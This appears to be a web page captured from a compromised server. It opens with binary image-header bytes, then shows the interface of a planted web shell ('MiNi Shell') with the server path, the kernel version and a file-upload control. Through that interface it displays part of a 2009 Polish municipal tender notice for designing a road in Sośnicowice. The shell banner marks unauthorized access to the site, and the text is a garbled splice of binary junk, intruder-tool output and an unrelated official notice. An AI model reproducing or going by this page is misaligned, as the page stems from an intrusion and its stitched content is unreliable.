JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090508/139824-N-2009.html

<p class="kh_header"><b>Sośnicowice: Projektu budowy drogi prowadzącej do nieruchomości przy ul. Raciborskiej 
nr 69-73 w Sośnicowicach</b><br>
<b>Numer ogłoszenia: 139824 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sośnicowice , Rynek 19, 44-153 Sośnicowice, woj. śląskie, tel. 032 2387191 w. 330, faks 032 2387550.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sosnicowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projektu budowy drogi prowadzącej do nieruchomości przy ul. Raciborskiej 
nr 69-73 w Sośnicowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot opracowania projektowego.
Przedmiotem niniejszego opisu przedmiotu zamówienia jest wykonanie dokumentacji projektowej           (projektu budowlano - wykonawczego ) budowy drogi prowadzącej do nieruchomości przy ul. Raciborskiej nr 69-73 w Sośnicowicach.

Projekt powinien być opracowany zgodnie z warunkami wydanymi przez Urząd Miejski w Sośnicowicach 
oraz Zarząd Dróg Wojewódzkich w Katowicach (o warunki wnioskuje Wykonawca), wraz z uzgodnieniami, opiniami i pozwoleniami niezbędnymi  do  realizacji  zadania, w  tym :
            -   warunki na zajęcie pasa drogowego,
            -   ustalenie warunków na odprowadzenie wód ( kanalizacja deszczowa ),
              -   projekt organizacji ruchu na czas budowy ( oraz docelowej organizacji ruchu - fakultatywnie)
            -   aktualizacja mapy zasadniczej,
            -   pozwolenie na budowę.

1. Elementy  zamawianej dokumentacji projektowej 

1/  Mapa do celów projektowych  (1egz. z klauzulą  dla Zamawiającego + egzemplarze dla potrzeb      
       projektowania )  
2/  Badania geotechniczne i określenie warunków gruntowo-wodnych podłoża  gruntowego  ( 3 egz.)
3/  Wniosek o ustalenie lokalizacji inwestycji celu publicznego  ( 3 egz.)
4/  Wniosek o wydanie decyzji o środowiskowych uwarunkowaniach  ( 3 egz.)
5/  Raport oddziaływania przedsięwzięcia na środowisko ( fakultatywnie )  ( 5 egz.)                       
6/  Projekt budowlany  ( 5 egz.)
7/  Projekt wykonawczy ( 5 egz.)
8/  Przedmiar  robót  ( 5 egz.)
9/  Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót  ( 5 egz.)
10/  Projekt zmiany organizacji ruchu na czas budowy  ( 5 egz.),  oraz  Projekt  docelowej  organizacji    ruchu ( fakultatywnie )
11/  Operat wodnoprawny  ( 3 egz.)
12/  Informacja dotycząca bezpieczeństwa i ochrony zdrowia  ( 5 egz.) 
13/  Inwentaryzacja zadrzewienia kolidującego z rozwiązaniami projektowymi  
       i plan wyrębu  ( 3 egz.)
14/  Kosztorys inwestorski  ( 3 egz.)
15/ Pozwolenie na budowę.

 2. Założenia wyjściowe do  projektowania 
- kategoria drogi   -  gminna ( ul. bez nazwy - droga boczna drogi woj.. Nr 919, ul. Raciborskiej )
- klasa drogi   -  D
-  Zakres rozwiązań projektowych obejmuje :   
a/ budowę ulepszonej nawierzchni drogowej ul. Bez nazwy w Sośnicowicach, której zakres 
    i lokalizacja określone zostały  w załączniku nr 2,
        b/   odwodnienie w/w odcinka drogi,
         c/   zabezpieczenie i ewentualną przebudowę kolidujących urządzeń infrastruktury technicznej,
         d/  Projekt winien uwzględnić lokalizację peronu do obsługi pasażerów komunikacji autobusowej.
 
  -   wymagana  konstrukcja nawierzchni jezdni drogi gminnej  -  ( dla  podłoża  G1 ):	
         -  warstwa ścieralna z brukowej kostki betonowej  grubości  8cm ( kolor szary ) ,
         -  podsypka cementowo - piaskowa  ( 1 : 4 )  grubości  5 cm ,
         -  podbudowa z kruszywa łamanego kl. I stabilizowanego mechanicznie 0-32 mm grubości  20 cm , 

          -  warstwa mrozoodporna z piasku płukanego grubości  25 cm  

         -  krawężnik betonowy  20cm x 30cm  x 100 cm na ławie z oporem ( beton C16/20 ) .
    
3. Szczegółowe wymagania dla opracowań projektowych

3.1. Mapa do celów projektowania dróg. 
Mapa zasadnicza do celów projektowych dróg w skali 1:500 lub 1 :1000 powinna posiadać klauzulę właściwego ośrodka dokumentacji geodezyjnej oraz powinna spełniać wymagania  określone w ustawie [7] , ustawie [8]  i w ogólnych specyfikacjach technicznych  GG-00.00.00. - Wymagania ogólne [16.1]     i GG-00.11.01 - Wykonanie mapy dla celów projektowania dróg [16.2].  Aktualizacja treści mapy zasadniczej dotyczy nakładek tematycznych S+U+W+E.
W razie braku mapy zasadniczej  lub braku mapy zasadniczej w odpowiedniej skali , należy  wykonać mapę  jednostkową  przyjętą  do  zasobów  geodezyjnych. 

3.2. Badania geotechniczne i określenie warunków gruntowo-wodnych podłoża gruntowego.
Badania  geotechniczne  należy  wykonać  zgodnie  z  załącznikiem  nr  4  do  [3]  oraz  [14].      
 
3.3  Wniosek o ustalenie lokalizacji inwestycji celu publicznego.
Wniosek  należy  opracować  zgodnie  z  [11].

3.4.  Wniosek o wydanie decyzji o środowiskowych  uwarunkowaniach.
Wniosek  j.w. należy opracować zgodnie z  [13a]. Integralną część wniosku stanowi informacja               
o planowanym  przedsięwzięciu  opracowana  zgodnie  z  art. 49 ust. 3 [13a].

3.5.  Raport  o oddziaływaniu przedsięwzięcia na środowisko ( fakultatywnie ).
Konieczność wykonania raportu j.w. i jego zakres wyniknie  z procedury  dotyczącej postępowania        
w sprawie  oceny  oddziaływania  na  środowisko,  zgodnie  z  [13a].

3.6. Projekt  budowlany.
Projekt budowlany obejmuje swoim zakresem budowę ulepszonej nawierzchni drogowej ul. bez nazwy w Sośnicowicach na odcinku od drogi wojewódziej nr 919 - ulicy Raciborskiej do posesji nr 73 wraz 
z odwodnieniem, zabezpieczenie i ewentualną przebudowę kolidujących  urządzeń  infrastruktury  technicznej. 
Projekt winien uwzględnić lokalizację peronu do obsługi pasażerów komunikacji autobusowej.
Szczegółowy zakres i forma projektu budowlanego powinna przede wszystkim spełniać wymagania określone w ustawie prawo budowlane [1] w tym w art. 34 ust.1, 2 i 3 oraz w rozporządzeniu [2] 
i  w  warunkach  technicznych  [3].

Projekt budowlany powinien zawierać : 
I. Projekt zagospodarowania terenu - zawartość musi być zgodna m.in. z treścią Rozdziału 3
    rozporządzenia [2]  i  zawierać:
1.Część opisową - zawartość musi być m.in. zgodna z treścią § 8 ust. 2 rozporządzenia [2].
  Treść  Części Opisowej  powinna  uwzględniać  także  poniższą  ramową  zawartość:
1.Przedmiot inwestycji.
2.Istniejący stan zagospodarowania terenu (opis w zakresie niezbędnym do uzupełnienie części
   rysunkowej). 
3.Istniejące  terenowe  uwarunkowania  realizacyjne. 
4.Projektowane zagospodarowanie terenu (w zakresie niezbędnym do uzupełnienia części rysunkowej). 
5.Projektowane obiekty i urządzenia budowlane. 
6.Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego 
   obiektu  budowlanego. 
7.Opinie , stanowiska , uzgodnienia , pozwolenia i warunki. 
W tym punkcie należy zamieścić wykaz i kopie ( w razie potrzeby uwierzytelnione ) : stanowisk, uzgodnień,
 opinii, warunków i innych pism uzyskanych w trakcie  wykonywania opracowania.
   Instytucje, które powinny wypowiedzieć się na temat wszystkich elementów   planowanej inwestycji
      ( w zakresie swoich kompetencji ) to : 
- zainteresowani  właściciele  lub  zarządcy : dróg , kolei , wód , urządzeń  infrastruktury    technicznej
  i innych obiektów : w zakresie wydawania  warunków do budowy  zarządzanych przez nich obiektów 
 oraz w zakresie uzgadniania odpowiednich rozwiązań projektowych , zapewnienia dostaw energii
  (w zależności od potrzeb) , odbioru  ścieków ( w zależności od potrzeb) , warunków  przyłączenia do 
   sieci uzbrojenia terenu ,
- właściwe jednostki organizacyjne, w których kompetencji leży wydawanie opinii, uzgodnień i pozwoleń 
   wymaganych  przepisami  szczególnymi ,  w tym  Zespół  Uzgadniania  Dokumentacji  Projektowych .

2. Część rysunkową -  zawartość  musi być  zgodna z treścią § 8 ust. 1 i 3 i § 9 i 10 rozporządzenia [2].
Projekt zagospodarowania terenu należy sporządzić  na mapie do celów projektowych zgodnie z  § 4 ust. 1 
i ust. 2  ustawy  [8].

II. Projekt architektoniczno - budowlany  dla  wszystkich  projektowanych  obiektów - zawartość musi być  zgodna  m.in.  z  treścią  rozdziału  4  rozporządzenia  [2].                                                               
 Zgodnie  z  rozporządzeniem  [2]  projekt  architektoniczno - budowlany  zawiera :
1.Opis techniczny -  zawartość  musi  być  zgodna  z  treścią  § 11 ust. 2 rozporządzenia [2].      
W opisie technicznym obiektów budowlanych powinny być zamieszczane wyniki obliczeń konstrukcji obiektów  oraz  informacje  gdzie  jest  dostępny  komplet  obliczeń. 
2.Część rysunkową - rysunki wszystkich obiektów budowlanych powinny przede wszystkim spełniać wymagania  m.in. § 12 i § 13  rozporządzenia  [2]. 
Na  rysunkach  należy  zamieścić  w  razie  potrzeby  stosowne  dane do wytyczenia obiektów w  terenie.

Część rysunkowa powinna zawierać co najmniej poniższe rysunki : 
1. Dla obiektów drogowych
-    plan sytuacyjny (1:500 - 1:1000),
-    przekroje normalne - charakterystyczne (1:50 - 1:100),
-    przekroje podłużne (1:100/1000 - 1:200/2000),
-    przekroje poprzeczne (1:100 -1:200) - niezbędne do ustalenia granic pasa drogowego i działek         
      wymagających  wykupu.
2 . Dla innych obiektów
     -  w  zależności  od  potrzeb.
3.  Dla urządzenia ochrony środowiska
     -  w  zależności  od  potrzeb. 
4.  Dla infrastruktury technicznej związanej i nie związanej z drogą
     -  w  zależności  od  potrzeb.

Do projektu budowlanego należy dołączyć  oświadczenie projektanta oraz oświadczenie  sprawdzającego o sporządzeniu projektu budowlanego zgodnie z umową , obowiązującymi przepisami  techniczno - budowlanymi , normami , wytycznymi  oraz  zasadami  wiedzy  technicznej , i  że projekt jest  kompletny  
z  punktu  widzenia  celu , któremu  ma  służyć .
3.7. Projekt wykonawczy.
Celem tego opracowania projektowego jest uzyskanie niezbędnych danych dla potrzeb wykonania, odbioru 
i rozliczenia robót budowlanych.

W skład projektu wykonawczego wchodzą m.in. następujące składniki obejmujące wszystkie planowane obiekty, instalacje i urządzenia :
1. Opis  techniczny.
2. Część  rysunkowa.
3. Uzgodnienia  branżowe  elementów  sieci  uzbrojenia  w  rejonie  projektowanych  robót .
Do projektu wykonawczego należy także dołączyć oświadczenie projektanta oraz oświadczenie sprawdzającego o sporządzeniu dokumentacji  zgodnie z umową , obowiązującymi przepisami techniczno - budowlanymi  , normami , wytycznymi  oraz zasadami wiedzy technicznej , i że przedmiotowa  dokumentacja  jest  kompletna  z  punktu  widzenia  celu , któremu  ma  służyć .

3.8. Przedmiar  robót.
Przedmiar robót należy wykonać dla wszystkich branż i wszystkich robót objętych dokumentacją projektową zgodnie z § 6.1. , § 6.2. , § 7. , § 8.1. , § 8.2. , § 8.3. , § 9.1. , § 9.2. , § 10.1., § 10.2.   rozporządzenia [12] . 
W przedmiarze robót należy również uwzględnić opłaty za zajęcie pasa drogowego .

3.9. Szczegółowe specyfikacje techniczne wykonania i odbioru robót ( SSTWiOR ).
Specyfikacje techniczne wykonania i odbioru robót należy wykonać zgodnie z [12] . Powinny one zawierać  szczegółowe  wymagania  dla  wykonawcy  robót  w  zakresie :   
sprzętu, materiałów, transportu, wykonania robót, kontroli jakości robót, obmiarów  robót, odbiorów robót i podstaw płatności za roboty . Specyfikacje ponadto muszą  dotyczyć zakresu  robót objętych  dokumentacją  projektową  i  uwzględniać  warunki  techniczno  -  budowlane,  normy  i  przepisy.
3.10.Projekt zmiany organizacji ruchu na czas budowy  (oraz Projekt docelowej organizacji ruchu      - fakultatywnie).  
Projekt  organizacji ruchu należy wykonać zgodnie z [6] i uzyskać zatwierdzenie przez organ zarządzający ruchem.
3.11. Operat wodnoprawny. 
Operat wodnoprawny należy wykonać zgodnie z [9].
3.12. Informacja dotycząca bezpieczeństwa i ochrony zdrowia.
Powyższą informację należy opracować zgodnie z  [4]. 
3.13. Inwentaryzacja zadrzewienia kolidującego z rozwiązaniami projektowymi i plan wyrębu. Inwentaryzacja oraz plan wyrębu ma być załącznikiem do wniosku  o uzyskanie pozwolenia na wycinkę drzew i krzewów, który należy opracować zgodnie z [10].
3.14. Kosztorys Inwestorski
Kosztorys inwestorski powinien odpowiadać m.in. wymaganiom określonym w rozporządzeniu [5]. Kosztorys należy wykonać w programie kosztorysowania NORMA lub kompatybilnym.

3.15. Dokumentacja geodezyjna i kartograficzna związana z nabywaniem nieruchomości
         i z czasowym korzystaniem z nieruchomości.  
Dokumentacja j.w. powinna spełniać wymagania określone w ustawie [7] a także uwzględniać wymagania określone w ogólnych specyfikacjach technicznych GG-00.00.00. - Wymagania ogólne [16.1] , GG-00.21.03. - Opracowywanie dokumentacji geodezyjnej i kartograficznej związanej z nabywaniem nieruchomości pod pasy drogowe [16.3] i GG-00.21.04. - Opracowanie dokumentacji geodezyjnej i kartograficznej związanej z uregulowaniem stanu prawnego gruntów zajętych pod pasy drogowe w latach ubiegłych [16.4] .

3.16. Dokumentacja  formalno-prawna  niezbędna  w  celu  nabycia  prawa  do  dysponowania
          nieruchomościami  na  cele  budowlane  i  nabycia  prawa  do  czasowego  korzystania 
         z  nieruchomości.
Dokumentacja formalno-prawna j.w. powinna spełniać wymagania określone w ogólnych specyfikacjach technicznych GG-00.00.00. - Wymagania ogólne [16.1] i GG-00.21.05. - Opracowanie dokumentacji formalno-prawnej niezbędnej w celu nabywania nieruchomości pod pasy drogowe [16.5] .

4.  Materiały wyjściowe przekazane przez Zamawiającego
Po podpisaniu umowy z Wykonawcą zostaną przekazane następujące materiały :
        -  plan liniowy ,
        -  punkty referencyjne.

5. Wymagania dodatkowe dla Jednostki Projektowania. 
1. Jednostka Projektowania wystąpi do Urzędu Miejskiego w Sośnicowicach o uzgodnienie założeń wyjściowych do kosztorysowania  oraz o podanie warunków technicznych do projektowania.
2. Jednostka Projektowania uzyska decyzje : o ustaleniu lokalizacji  inwestycji celu publicznego, decyzje 
o środowiskowych uwarunkowaniach, pozwolenie wodnoprawne oraz pozwolenie na wycinkę drzew. 
   Zamawiający udzieli Jednostce Projektowania pełnomocnictwa  do występowania w Jego imieniu      
z  wnioskami  o  uzyskanie  powyższych  decyzji .
   Termin wystąpienia z wnioskiem o pozwolenie na wycinkę drzew należy wcześniej uzgodnić             
z  Zamawiającym .
3. Jednostka Projektowania skompletuje wszystkie materiały stanowiące załącznik do wniosku               
o wydanie decyzji o pozwoleniu na budowę.
4.  Jednostka Projektowania uzyska decyzję o pozwoleniu na budowę.
5. Wykonawca przekaże Zamawiającemu dokumentację projektową dodatkowo w wersji elektronicznej na  nośniku  CD w formatach zapisu odpowiednio do programów corel i autocad w państwowym układzie współrzędnych oraz jako pliki  graficzne w rozszerzeniach  *. pdf i   *. jpg.
6. Dokumentację projektową należy odpowiednio skompletować w oddzielnych teczkach  kartonowych
  z rączką ( po 5szt.) z wykazem zawartości teczki. Do kompletowania dokumentacji nie stosować
  kartonów archiwizacyjnych .

6. Niedopuszczalna jest pod rygorem nieważności taka zmiana umowy oraz wprowadzenie 
    do niej takich postanowień, które byłyby niekorzystne dla Zamawiającego, jeżeli przy ich
 uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru
  Wykonawcy, nie dotyczy to sytuacji gdy konieczność wprowadzenia takich zmian wyniknie 
   w rezultacie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.

7 PRZEPISY ZWIĄZANE 
Przepisy prawne 
[1]  Ustawa z dnia 07.07.1994r. Prawo budowlane ( Dz. U. z 2006 r., Nr 156 ,  poz. 1118, tekst jednolity z późniejszymi zmianami ).
2]  Rozporządzenie Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego  ( Dz.U. z 2003 r., Nr120, poz.1133 ).
[3]  Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 02.03.1999 r. w sprawie warunków technicznych,  jakim powinny odpowiadać drogi publiczne i ich usytuowanie  ( Dz.U. z 1999r., Nr 43, poz.430 ).

[4]  Rozporządzenie  Ministra  Infrastruktury  w  sprawie  informacji  dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu  
bezpieczeństwa i ochrony zdrowia  ( Dz.U. z 2003 r.,Nr 120, poz.1126 ).


[5]  Rozporządzenie Ministra Infrastruktury  z dnia 18.05.2004r. w sprawie określenia metod i  podstaw  sporządzania kosztorysu inwestorskiego,  obliczania planowanych kosztów prac  projektowych oraz planowanych kosztów robót budowlanych określonych 
w programie funkcjonalno - użytkowym  ( Dz.U. z 2004 r., Nr 130, poz. 1389 ).
[6]   Rozporządzenie Ministra Infrastruktury z dnia 23.09.2003r. w sprawie szczegółowych warunków  zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem  ( Dz.U. z 2003r., Nr 177, poz. 1729 ).
[7]  Ustawa z dnia 17.05.1989 r. Prawo geodezyjne i kartograficzne ( Dz.U. z 2005 r., Nr 240, poz. 2027, tekst jednolity         
z  późniejszymi zmianami ).
[8]  Rozporządzenie Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02.1995r. w sprawie rodzaju opracowań geodezyjno - kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie ( Dz.U. z 1995 r., Nr 25,    poz. 133 ).
[9] Ustawa z dnia 18.07.2001r. - Prawo wodne ( Dz.U. z 2005 r., Nr115, poz. 2019, tekst jednolity              
z późniejszymi zmianami ).
[10] Ustawa z dnia 16.04.2004r. o ochronie przyrody  ( Dz.U. z 2004 r., Nr92, poz.880 z późniejszymi zmianami ).
[11] Ustawa z dnia 27.03.2003 r. o planowaniu przestrzennym ( Dz.U. z 2003 r., Nr 80, poz. 717                
z późniejszymi zmianami ).
[12]  Rozporządzenie Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego  zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego ( Dz.U. z 2004 r., Nr 202 , poz. 2072 z późniejszymi zmianami ).
[13]  Ustawa z dnia 21.08.1997r. o gospodarce nieruchomościami ( Dz.U. z 2004 r., Nr 261, poz.2603 , tekst jednolity z późniejszymi zmianami ).
[13a] Ustawa z dnia 27.04.2001r. Prawo ochrony środowiska ( Dz.U. z 2006 r., Nr 129, poz. 902, tekst jednolity 
z późniejszymi zmianami ). 

Wytyczne i instrukcje.
[14]  Instrukcja badań podłoża gruntowego budowli drogowych i mostowych. Część 1 i 2. GDDP Warszawa 1998 r.
[15]  Katalog  typowych  konstrukcji  nawierzchni  podatnych  i  półsztywnych. IBDIM . Warszawa  1997 r. 
[16]  Ogólne specyfikacje techniczne obejmujące potrzeby drogownictwa w zakresie geodezji i kartografii oraz nabywania nieruchomości. GDDP Warszawa 1998, w tym :
[16.1]  GG-00.00.00. - Wymagania ogólne.
[16.2]  GG-00.11.01. - Wykonanie mapy dla celów projektowania dróg.
[16.3]  GG-00.21.03. - Opracowywanie dokumentacji geodezyjnej i kartograficznej związanej z nabywaniem nieruchomości pod pasy drogowe
[16.4]  GG-00.21.04. - Opracowanie dokumentacji geodezyjnej i kartograficznej związanej z uregulowaniem  stanu prawnego gruntów zajętych pod pasy drogowe w latach ubiegłych.
[16.5]  GG-00.21.05. - Opracowanie dokumentacji formalno-prawnej niezbędnej w celu nabywania nieruchomości pod pasy drogowe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział Wykonawcy, którzy spełniają wymagania opisane w art. 22 ust, 1 ustawy Prawo zamówień
    publicznych, w oparciu o przedłożone dokumenty.
2. Sposób dokonania oceny spełnienia wymaganych warunków:
1) przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
2) niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania; ofertę Wykonawcy
    wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca musi złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 PZP oraz że nie podlega wykluczeniu na podstawie art. 24 ust. 1 PZP. 

2. Ponadto w celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności 
i nie podlega wykluczeniu na podstawie art. 24 PZP, Zamawiający żąda następujących dokumentów:
a) odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne   
      przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawionego 
      nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
     O akualności dokumentu decyduje wyłącznie data jego wystawienia, 
    a nie data potwierdzenia jego aktualizacji,
b) kompletnie wypełnionego i podpisanego formularza ofertowego,
c) zaparafowanego projektu umowy,
d) wypełnionego wykazu usług (załącznik nr 5)
e) Kopii dokumentów potwierdzających posiadanie przez osoby, które Oferent wskaże do wykonania  zamównienia 
      o uprawnieniach projektowych w zakresie objętym zamówieniem wraz z aktualnymi zaświadczeniami tych osób
      o członkostwie w Okręgowej Izbie Inżynierów Budownictwa.

3. Zamawiający żąda, w celu potwierdzenia, że oferowana usługa, odpowiada określonym   
    przez niego wymaganiom, następujących dokumentów: 
- potwierdzenia wykonania co najmniej jednej usługi, w okresie ostatnich 3 lat przed dniem wszczęcia zamówienia, 
  a jeżeli okres  prowadzenia działalności jest krótszy, w tym okresie, odpowiadających każda swoim rodzajem i wartością
  lub usłudze  stanowiącej  przedmiot niniejszego  zamówienia, z podaniem wartości, przedmiotu,
 dat wykonania oraz załączenia dokumentów potwierdzających, że usługa ta
 została wykonana należycie - dopuszcza się w formie referencji.
4. Jeżeli Wykonawcy wspólnie ubiegają się o zamówienie (konsorcjum), zgodnie z art. 23 w związku z art. 141 ustawy Prawo zamówień publicznych Zamawiający żąda:
1) wszyscy konsorcjanci winni obligatoryjnie dołączyć do oferty dokumenty wymagane od Wykonawców wymienione 
    w pkt. 2. Dokumenty wymienione w pkt. 3 ppkt 1 składane mogą być wspólnie i takiej podlegać będą ocenie. 
2) wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum;
3) w przypadku wyboru przez Zamawiającego oferty złożonej przez konsorcjum, Wykonawcy tworzący konsorcjum  
